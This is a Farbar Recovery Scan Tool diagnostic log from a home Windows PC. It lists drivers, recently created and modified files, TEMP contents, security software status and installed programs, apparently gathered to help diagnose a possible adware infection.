S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [119512 2015-04-13] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2015-03-17] (Malwarebytes Corporation)
R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [239224 2014-11-15] (Microsoft Corporation)
R3 pfc; C:\Windows\System32\drivers\pfc.sys [21248 2003-09-19] (Padus, Inc.) [File not signed]
S3 rt70x86; C:\Windows\System32\DRIVERS\netr70.sys [306016 2010-04-27] (Ralink Technology Corp.)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-08-19] (Windows ® Codename Longhorn DDK provider)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13464 2014-07-02] ()
S3 cpuz134; \??\C:\Users\Angel\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-13 15:09 - 2015-04-13 15:10 - 00021713 _____ () C:\Users\Angel\Desktop\FRST.txt
2015-04-13 15:09 - 2015-04-13 15:09 - 01135616 _____ (Farbar) C:\Users\Angel\Desktop\FRST.exe
2015-04-13 15:06 - 2015-04-13 15:06 - 00001063 _____ () C:\Malware.txt
2015-04-13 14:44 - 2015-04-13 14:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-04-13 14:41 - 2015-04-13 14:41 - 21540440 _____ (Malwarebytes Corporation ) C:\Users\Angel\Downloads\mbam-setup-2.1.4.1018.exe
2015-04-13 14:32 - 2015-04-13 14:32 - 02217984 _____ () C:\Users\Angel\Downloads\adwcleaner_4.201.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Angel\Downloads\revosetup.exe
2015-04-13 14:19 - 2015-04-13 14:19 - 00001059 _____ () C:\Users\Angel\Desktop\Revo Uninstaller.lnk
2015-04-13 14:19 - 2015-04-13 14:19 - 00000000 ____D () C:\Program Files\VS Revo Group
2015-04-12 20:26 - 2015-04-12 20:54 - 00003364 _____ () C:\Windows\PFRO.log
2015-04-11 22:51 - 2015-04-11 22:51 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-04-11 22:51 - 2015-04-11 22:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-04-11 22:50 - 2015-04-11 22:50 - 00000000 ____D () C:\Program Files\iPod
2015-04-11 22:49 - 2015-04-11 22:49 - 00000000 ____D () C:\Program Files\Bonjour
2015-04-04 22:22 - 2015-04-04 22:22 - 00000000 ____D () C:\ProgramData\WindowsSearch
2015-04-03 18:19 - 2015-04-13 14:44 - 00302165 _____ () C:\Windows\WindowsUpdate.log
2015-04-03 17:31 - 2015-04-03 17:31 - 00000000 ____D () C:\Windows\pss
2015-04-03 17:17 - 2015-04-13 15:09 - 00000000 ____D () C:\FRST
2015-04-02 21:41 - 2015-04-02 21:42 - 00010074 _____ () C:\Users\Angel\Downloads\hijackthis.log
2015-04-02 21:40 - 2015-04-02 21:40 - 00388608 _____ (Trend Micro Inc.) C:\Users\Angel\Downloads\HijackThis.exe
2015-04-02 21:32 - 2015-04-02 21:32 - 00000806 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-04-02 21:31 - 2015-04-02 21:32 - 00000000 ____D () C:\Program Files\CCleaner
2015-04-02 21:20 - 2015-04-02 21:20 - 05346704 _____ (Piriform Ltd) C:\Users\Angel\Downloads\ccsetup504pro.exe
2015-04-02 19:51 - 2015-01-28 20:35 - 00369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-04-02 19:50 - 2015-01-28 20:35 - 00975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-04-02 19:48 - 2015-02-25 19:18 - 02064384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-04-02 19:40 - 2015-02-19 21:03 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-04-02 19:40 - 2015-02-19 19:28 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-04-02 19:39 - 2015-02-25 21:01 - 03604408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-04-02 19:39 - 2015-02-25 21:01 - 03552184 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-04-02 19:39 - 2015-01-08 21:04 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-04-02 19:39 - 2015-01-08 19:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-04-02 19:38 - 2015-03-05 23:01 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-04-02 19:38 - 2015-01-20 21:02 - 00807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-04-02 19:37 - 2015-02-17 21:02 - 11587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-04-02 18:54 - 2015-02-21 12:37 - 12375040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-04-02 18:54 - 2015-02-21 12:34 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-04-02 18:54 - 2015-02-21 12:29 - 09747968 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-04-02 18:54 - 2015-02-21 12:28 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-04-02 18:54 - 2015-02-21 12:22 - 01139200 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-04-02 18:54 - 2015-02-21 12:21 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-04-02 18:54 - 2015-02-21 12:21 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 01803264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-04-02 18:54 - 2015-02-21 12:18 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2015-04-02 18:54 - 2015-02-21 12:18 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2015-04-02 18:54 - 2015-02-21 12:18 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2015-04-02 18:54 - 2015-02-21 12:17 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-04-02 14:13 - 2015-04-13 14:34 - 00000000 ____D () C:\AdwCleaner
2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-13 15:09 - 2012-04-28 13:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-04-13 14:49 - 2014-09-29 09:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-04-13 14:44 - 2014-09-29 09:07 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-04-13 14:44 - 2014-09-29 09:07 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-04-13 14:42 - 2006-11-02 05:33 - 00747142 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-04-13 14:37 - 2010-06-11 20:52 - 00000000 ____D () C:\Users\Angel\Tracing
2015-04-13 14:35 - 2014-09-29 09:15 - 00000644 _____ () C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2015-04-13 14:35 - 2014-09-29 09:00 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-04-13 14:35 - 2009-02-09 18:08 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2015-04-13 14:35 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-04-13 14:35 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2015-04-13 14:35 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2015-04-13 14:34 - 2006-11-02 08:01 - 00032550 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2015-04-12 20:42 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\rescache
2015-04-12 20:26 - 2006-11-02 07:37 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-04-12 20:26 - 2006-11-02 06:18 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2015-04-11 22:51 - 2012-09-20 22:34 - 00000000 ____D () C:\Program Files\iTunes
2015-04-11 22:50 - 2009-02-17 14:53 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-04-11 22:43 - 2015-02-09 21:19 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-04-06 12:54 - 2009-08-31 22:05 - 00000000 ____D () C:\Users\Angel\Documents\BANK STUFF
2015-04-02 21:34 - 2014-12-08 16:18 - 00000000 ____D () C:\Program Files\Steam
2015-04-02 21:34 - 2010-05-07 11:04 - 00000000 ____D () C:\Windows\Minidump
2015-04-02 21:34 - 2009-09-21 11:48 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Media Player Classic
2015-04-02 21:34 - 2008-02-03 18:07 - 00000000 ____D () C:\Windows\Panther
2015-04-02 19:59 - 2014-09-29 09:15 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2015-04-02 19:54 - 2006-11-02 07:47 - 00374064 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-04-02 19:50 - 2009-02-17 14:20 - 00000000 ____D () C:\ProgramData\Microsoft Help
2015-04-02 19:48 - 2013-07-12 17:46 - 00000000 ____D () C:\Windows\system32\MRT
2015-04-02 19:41 - 2006-11-02 05:24 - 119837696 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2015-04-02 19:37 - 2015-02-19 22:52 - 00000000 ____D () C:\Program Files\iPod(68)
2015-04-02 19:13 - 2015-02-16 13:17 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb
2015-04-02 18:45 - 2014-09-29 09:01 - 00002085 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-04-02 18:36 - 2009-02-16 19:37 - 00000000 ____D () C:\Users\Angel
2015-04-02 18:36 - 2006-11-02 05:22 - 58720256 _____ () C:\Windows\system32\config\software_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 44564480 _____ () C:\Windows\system32\config\components_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 41943040 _____ () C:\Windows\system32\config\system_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 05242880 _____ () C:\Windows\system32\config\default_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\security_previous
2015-04-02 18:36 - 2006-11-02 05:22 - 00262144 _____ () C:\Windows\system32\config\sam_previous
2015-04-02 18:34 - 2014-12-10 21:10 - 00000000 ____D () C:\Users\Angel\AppData\Local\23897
2015-04-02 18:34 - 2014-12-03 23:05 - 00000000 ____D () C:\Users\Angel\AppData\Local\4657
2015-04-02 18:34 - 2014-12-01 20:28 - 00000000 ____D () C:\Users\Angel\AppData\Local\32244
2015-04-02 18:34 - 2014-09-29 09:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-04-02 18:34 - 2014-09-25 15:58 - 00000000 ____D () C:\Users\Public\518FC3555F9246E4AC8055FCEF3883E5
2015-04-02 18:34 - 2014-09-17 15:32 - 00000000 ____D () C:\Users\Public\B4D0DA65314B4041838806CA0CC88B7B
2015-04-02 18:34 - 2010-08-26 16:30 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\.BitTornado
2015-04-02 18:34 - 2009-09-21 12:05 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\vlc
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\ProgramData\NOS
2015-04-02 18:34 - 2009-03-09 13:18 - 00000000 ____D () C:\Program Files\NOS
2015-04-02 18:34 - 2009-02-18 15:22 - 00000000 ____D () C:\Users\Angel\Desktop\Iconotopia
2015-04-02 18:34 - 2009-02-17 16:46 - 00000000 ____D () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HP
2015-04-02 18:34 - 2009-02-17 15:25 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-04-02 18:34 - 2009-02-17 14:20 - 00000000 ____D () C:\Users\Angel\AppData\Local\Microsoft Help
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-04-02 18:34 - 2009-02-16 19:37 - 00000000 ___RD () C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 __RSD () C:\Windows\Media
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\spool
2015-04-02 18:34 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\system32\Msdtc
2015-04-02 18:33 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\registration
2015-04-02 17:53 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\schemas
2015-03-17 06:15 - 2014-09-29 09:07 - 00092888 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-03-17 06:15 - 2014-09-29 09:07 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
 
==================== Files in the root of some directories =======
 
2014-08-04 18:04 - 2014-08-04 18:04 - 0000046 _____ () C:\Users\Angel\AppData\Roaming\WB.CFG
2009-02-17 13:32 - 2014-07-29 09:05 - 0007052 _____ () C:\Users\Angel\AppData\Local\d3d9caps.dat
2009-03-03 16:39 - 2012-09-17 20:20 - 0006656 _____ () C:\Users\Angel\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2009-02-17 15:05 - 2009-02-17 15:05 - 0008248 _____ () C:\Users\Angel\AppData\Local\en.ini
2009-02-17 16:51 - 2009-02-17 16:51 - 0000093 _____ () C:\Users\Angel\AppData\Local\fusioncache.dat
2009-02-17 16:00 - 2009-02-17 16:48 - 0003386 _____ () C:\ProgramData\hpzinstall.log
 
Some content of TEMP:
====================
C:\Users\Angel\AppData\Local\Temp\Quarantine.exe
C:\Users\Angel\AppData\Local\Temp\ReimagePackage.exe
C:\Users\Angel\AppData\Local\Temp\ReiSysUpdate.exe
C:\Users\Angel\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-04-13 14:41
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-04-2015
Ran by Angel at 2015-04-13 15:11:20
Running from C:\Users\Angel\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ABBYY FineReader 6.0 Sprint (HKLM\...\{ACF60000-22B9-4CE9-98D6-2CCF359BAC07}) (Version: 6.00.1395.4552 - ABBYY Software House)
Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe Download Manager (HKLM\...\{E2883E8F-472F-4fb0-9522-AC9BF37916A7}) (Version: 1.6.2.48 - NOS Microsystems Ltd.)
Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader X (10.1.13) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.13 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM\...\{2FE00055-C4F3-4F7A-AEDD-E198D54CF12F}) (Version: 3.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{28ED482A-56DB-47D9-8D9E-990FA8CD7D3D}) (Version: 8.1.0.18 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft PhotoImpression 5 (HKLM\...\{D433ABC3-0CD8-4BB0-B6A9-84501B4B47B7}) (Version:  - ArcSoft)
BitTornado 0.3.17 (HKLM\...\BitTornado) (Version: 0.3.17 - John Hoffman)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
BufferChm (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Business Tools Launcher (HKLM\...\{75685CA8-0B74-45BB-9C64-744A0FB79EDC}) (Version: 1.00.0000 - Dell Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.04 - Piriform)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
CreativeProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CreativeProjectsTemplates (Version: 43.1.5.000 - Hewlett-Packard) Hidden
CueTour (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Destinations (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Devil May Cry 3: Special Edition (HKLM\...\Steam App 6550) (Version:  - CAPCOM Co., Ltd.)
Devil May Cry 4 (HKLM\...\Steam App 45700) (Version:  - Capcom)
Director (Version: 43.1.5.000 - Hewlett-Packard) Hidden
EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )
EPSON Attach To Email (HKLM\...\InstallShield_{20C45B32-5AB6-46A4-94EF-58950CAF05E5}) (Version: 1.01.0000 - SEIKO EPSON)
EPSON Attach To Email (Version: 1.01.0000 - SEIKO EPSON) Hidden
EPSON Copy Utility 3 (HKLM\...\{67EDD823-135A-4D59-87BD-950616D6E857}) (Version: 3.1.5.0 - )
EPSON Event Manager (HKLM\...\{48F22622-1CC2-4A83-9C1E-644DD96F832D}) (Version: 1.71.00 - )
EPSON File Manager (HKLM\...\{E86BC406-944E-41F6-ADE6-2C136734C96B}) (Version: 1.1.0.0 - )
EPSON Perf 3490 3590 Guide (HKLM\...\Silent Package Run-Time Sample) (Version:  - )
EPSON Scan (HKLM\...\EPSON Scanner) (Version:  - )
EPSON Scan Assistant (HKLM\...\{2A88F1BF-7041-4E42-84B1-6B4ACB83AC64}) (Version: 1.10.00 - )
Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.118 - Google Inc.)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
HP Image Zone 4.0 (HKLM\...\HP Photo & Imaging) (Version: 4.0 - HP)
HP Software Update (HKLM\...\{457791C5-D702-4143-A7B2-2744BE9573F2}) (Version: 2.0.39.20040212 - Hewlett-Packard)
HPSystemDiagnostics (Version: 1.5.0.0 - Your Company Name) Hidden
iCloud (HKLM\...\{79BD66B2-4DAE-4C3B-B08E-DC72E507C163}) (Version: 2.1.3.25 - Apple Inc.)
InstantShare (Version: 4.0.0.40 - Hewlett-Packard) Hidden
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - )
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
iTunes (HKLM\...\{0A37EE62-9A58-420D-90CC-4E52153112EE}) (Version: 11.3.0.54 - Apple Inc.)
Java 7 Update 55 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.550 - Oracle)
Java™ 6 Update 7 (HKLM\...\{3248F0A8-6813-11D6-A77B-00B0D0160070}) (Version: 1.6.0.70 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Linksys Linksys Wireless-G USB Network Adapter Driver - WUSB54Gv4 (HKLM\...\{C7EEF2B9-8C16-4A04-B98D-B1A952A47E55}) (Version: 1.0 - Linksys, A Division of Cisco Systems, Inc.)
Malwarebytes Anti-Malware version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Media Player Classic (HKLM\...\Media Player Classic) (Version:  - )
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM\...\M979906) (Version:  - )
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.7.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Overland (Version: 2.1.5 - Hewlett-Packard) Hidden
Peggle Deluxe (HKLM\...\Peggle Deluxe) (Version:  - PopCap Games)
Personal Entertainment Launcher (HKLM\...\{37F964E4-9C3F-4066-B933-1747D3AC6737}) (Version: 1.00.0000 - Dell Inc.)
Photo Viewer 2.4 (HKLM\...\Photo Viewer_is1) (Version:  - )
PhotoGallery (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Photosmart 320,370,7400,8100,8400 Series (HKLM\...\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}) (Version: 2.0 - HP)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Presto! BizCard 4.1 Eng (HKLM\...\Uninstall Presto! BizCard 4.1 Eng) (Version:  - )
PrintScreen (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Product Support Launcher (HKLM\...\{B8ABB25D-1E30-4ED7-A3CE-0F8BED439647}) (Version: 1.00.0000 - Dell Inc.)
PSPrinters06 (Version: 1.00.0000 - HP) Hidden
QFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
QuickProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roxio Activation Module (HKLM\...\{07159635-9DFE-4105-BFC0-2817DB540C68}) (Version: 1.0 - Roxio)
Roxio Creator Audio (HKLM\...\{83FFCFC7-88C6-41C6-8752-958A45325C82}) (Version: 3.5.0 - Roxio)
